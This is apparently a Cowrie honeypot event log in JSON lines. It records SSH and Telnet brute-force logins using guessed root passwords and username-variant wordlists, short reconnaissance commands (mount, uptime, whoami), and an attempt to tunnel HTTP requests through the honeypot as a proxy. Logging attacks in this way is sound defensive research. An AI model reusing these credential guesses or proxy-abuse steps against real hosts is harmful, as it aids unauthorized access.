{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:24:44.310781Z","src_ip":"217.72.205.35","session":"857698287cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49840,"dst_ip":"1.2.3.4","dst_port":22,"session":"e50ad45bc192","protocol":"ssh","message":"New connection: 212.227.125.160:49840 (1.2.3.4:22) [session: e50ad45bc192]","sensor":"my-vps","timestamp":"2025-08-31T08:25:37.381559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:25:38.434286Z","src_ip":"212.227.125.160","session":"e50ad45bc192"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:25:38.435906Z","src_ip":"212.227.125.160","session":"e50ad45bc192"}
{"eventid":"cowrie.login.success","username":"root","password":"Adm","message":"login attempt [root/Adm] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:25:44.116279Z","src_ip":"212.227.125.160","session":"e50ad45bc192"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:25:46.848521Z","src_ip":"212.227.125.160","session":"e50ad45bc192"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T08:25:46.849191Z","src_ip":"212.227.125.160","session":"e50ad45bc192"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:25:48.125967Z","src_ip":"212.227.125.160","session":"e50ad45bc192"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:25:48.127402Z","src_ip":"212.227.125.160","session":"e50ad45bc192"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44324,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfaba9803089","protocol":"telnet","message":"New connection: 212.227.235.229:44324 (1.2.3.4:23) [session: cfaba9803089]","sensor":"my-vps","timestamp":"2025-08-31T08:25:49.213862Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:25:49.400030Z","src_ip":"212.227.235.229","session":"cfaba9803089"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:25:49.416904Z","src_ip":"212.227.235.229","session":"cfaba9803089"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":58312,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9f78d5c21af","protocol":"ssh","message":"New connection: 201.148.180.50:58312 (1.2.3.4:22) [session: a9f78d5c21af]","sensor":"my-vps","timestamp":"2025-08-31T08:25:56.223619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:25:57.453137Z","src_ip":"201.148.180.50","session":"a9f78d5c21af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:25:57.453864Z","src_ip":"201.148.180.50","session":"a9f78d5c21af"}
{"eventid":"cowrie.login.success","username":"root","password":"Adm","message":"login attempt [root/Adm] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:26:06.385320Z","src_ip":"201.148.180.50","session":"a9f78d5c21af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:26:10.272071Z","src_ip":"201.148.180.50","session":"a9f78d5c21af"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T08:26:10.272790Z","src_ip":"201.148.180.50","session":"a9f78d5c21af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:26:11.301875Z","src_ip":"201.148.180.50","session":"a9f78d5c21af"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:26:11.303079Z","src_ip":"201.148.180.50","session":"a9f78d5c21af"}
{"eventid":"cowrie.session.connect","src_ip":"79.127.48.196","src_port":60633,"dst_ip":"1.2.3.4","dst_port":22,"session":"5826649ba3a6","protocol":"ssh","message":"New connection: 79.127.48.196:60633 (1.2.3.4:22) [session: 5826649ba3a6]","sensor":"my-vps","timestamp":"2025-08-31T08:26:20.139715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:26:32.956683Z","src_ip":"79.127.48.196","session":"5826649ba3a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:26:32.957499Z","src_ip":"79.127.48.196","session":"5826649ba3a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63994,"dst_ip":"1.2.3.4","dst_port":23,"session":"d8b61fd54051","protocol":"telnet","message":"New connection: 212.227.125.160:63994 (1.2.3.4:23) [session: d8b61fd54051]","sensor":"my-vps","timestamp":"2025-08-31T08:27:13.154299Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Marley","message":"login attempt [root/Marley] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:27:21.808387Z","src_ip":"79.127.48.196","session":"5826649ba3a6"}
{"eventid":"cowrie.session.closed","duration":9.751043319702148,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:27:22.905260Z","src_ip":"212.227.125.160","session":"d8b61fd54051"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:27:47.895775Z","src_ip":"79.127.48.196","session":"5826649ba3a6"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T08:27:47.896451Z","src_ip":"79.127.48.196","session":"5826649ba3a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"8.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:27:56.151681Z","src_ip":"79.127.48.196","session":"5826649ba3a6"}
{"eventid":"cowrie.session.closed","duration":"108.8","message":"Connection lost after 108.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:28:08.920678Z","src_ip":"79.127.48.196","session":"5826649ba3a6"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":4615,"dst_ip":"1.2.3.4","dst_port":22,"session":"51d79f28ac8a","protocol":"ssh","message":"New connection: 80.94.95.15:4615 (1.2.3.4:22) [session: 51d79f28ac8a]","sensor":"my-vps","timestamp":"2025-08-31T08:28:13.988536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:28:13.989809Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:28:14.055721Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne","message":"login attempt [julianne/julianne] failed","sensor":"my-vps","timestamp":"2025-08-31T08:28:14.401584Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne1","message":"login attempt [julianne/julianne1] failed","sensor":"my-vps","timestamp":"2025-08-31T08:28:15.469165Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne123","message":"login attempt [julianne/julianne123] failed","sensor":"my-vps","timestamp":"2025-08-31T08:28:16.537185Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne1234","message":"login attempt [julianne/julianne1234] failed","sensor":"my-vps","timestamp":"2025-08-31T08:28:17.605571Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.login.failed","username":"julianne","password":"julianne12345","message":"login attempt [julianne/julianne12345] failed","sensor":"my-vps","timestamp":"2025-08-31T08:28:18.673376Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:28:19.741214Z","src_ip":"80.94.95.15","session":"51d79f28ac8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:28:49.419876Z","src_ip":"212.227.235.229","session":"cfaba9803089"}
{"eventid":"cowrie.session.closed","duration":180.2092056274414,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:28:49.422987Z","src_ip":"212.227.235.229","session":"cfaba9803089"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":2414,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a5990f096b8","protocol":"ssh","message":"New connection: 77.83.207.83:2414 (1.2.3.4:22) [session: 2a5990f096b8]","sensor":"my-vps","timestamp":"2025-08-31T08:29:20.528820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:29:20.529863Z","src_ip":"77.83.207.83","session":"2a5990f096b8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T08:29:20.580014Z","src_ip":"77.83.207.83","session":"2a5990f096b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:29:20.830842Z","src_ip":"77.83.207.83","session":"2a5990f096b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15283,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15283","sensor":"my-vps","timestamp":"2025-08-31T08:29:20.882147Z","session":"2a5990f096b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T08:29:20.932472Z","src_ip":"77.83.207.83","session":"2a5990f096b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":27787,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:27787","sensor":"my-vps","timestamp":"2025-08-31T08:29:21.076693Z","session":"2a5990f096b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T08:29:21.127053Z","src_ip":"77.83.207.83","session":"2a5990f096b8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":19676,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19676","sensor":"my-vps","timestamp":"2025-08-31T08:29:21.268862Z","session":"2a5990f096b8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T08:29:21.319182Z","src_ip":"77.83.207.83","session":"2a5990f096b8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:29:21.370555Z","src_ip":"77.83.207.83","session":"2a5990f096b8"}
{"eventid":"cowrie.session.connect","src_ip":"210.117.93.58","src_port":59952,"dst_ip":"1.2.3.4","dst_port":23,"session":"4c42a3ffa384","protocol":"telnet","message":"New connection: 210.117.93.58:59952 (1.2.3.4:23) [session: 4c42a3ffa384]","sensor":"my-vps","timestamp":"2025-08-31T08:30:39.936254Z"}
{"eventid":"cowrie.session.closed","duration":12.934009552001953,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:30:52.870190Z","src_ip":"210.117.93.58","session":"4c42a3ffa384"}
{"eventid":"cowrie.session.connect","src_ip":"150.241.115.7","src_port":54002,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e8884e1b336","protocol":"telnet","message":"New connection: 150.241.115.7:54002 (1.2.3.4:23) [session: 9e8884e1b336]","sensor":"my-vps","timestamp":"2025-08-31T08:31:10.668968Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55242,"dst_ip":"1.2.3.4","dst_port":22,"session":"19f9be53e91c","protocol":"ssh","message":"New connection: 217.72.205.35:55242 (1.2.3.4:22) [session: 19f9be53e91c]","sensor":"my-vps","timestamp":"2025-08-31T08:31:24.083705Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:31:24.084988Z","src_ip":"217.72.205.35","session":"19f9be53e91c"}
{"eventid":"cowrie.session.connect","src_ip":"43.224.126.107","src_port":45045,"dst_ip":"1.2.3.4","dst_port":22,"session":"c82fc6dfa112","protocol":"ssh","message":"New connection: 43.224.126.107:45045 (1.2.3.4:22) [session: c82fc6dfa112]","sensor":"my-vps","timestamp":"2025-08-31T08:31:27.092428Z"}
{"eventid":"cowrie.login.success","username":"root","password":"postgres1234567890","message":"login attempt [root/postgres1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:32:10.737564Z","src_ip":"150.241.115.7","session":"9e8884e1b336"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:32:10.756385Z","src_ip":"150.241.115.7","session":"9e8884e1b336"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41428,"dst_ip":"1.2.3.4","dst_port":22,"session":"997db9e7df7f","protocol":"ssh","message":"New connection: 212.227.125.160:41428 (1.2.3.4:22) [session: 997db9e7df7f]","sensor":"my-vps","timestamp":"2025-08-31T08:32:20.062737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:32:20.904408Z","src_ip":"212.227.125.160","session":"997db9e7df7f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:32:20.905306Z","src_ip":"212.227.125.160","session":"997db9e7df7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35018,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe04884da5a","protocol":"ssh","message":"New connection: 212.227.235.229:35018 (1.2.3.4:22) [session: 7fe04884da5a]","sensor":"my-vps","timestamp":"2025-08-31T08:32:24.667338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:32:24.670969Z","src_ip":"212.227.235.229","session":"7fe04884da5a"}
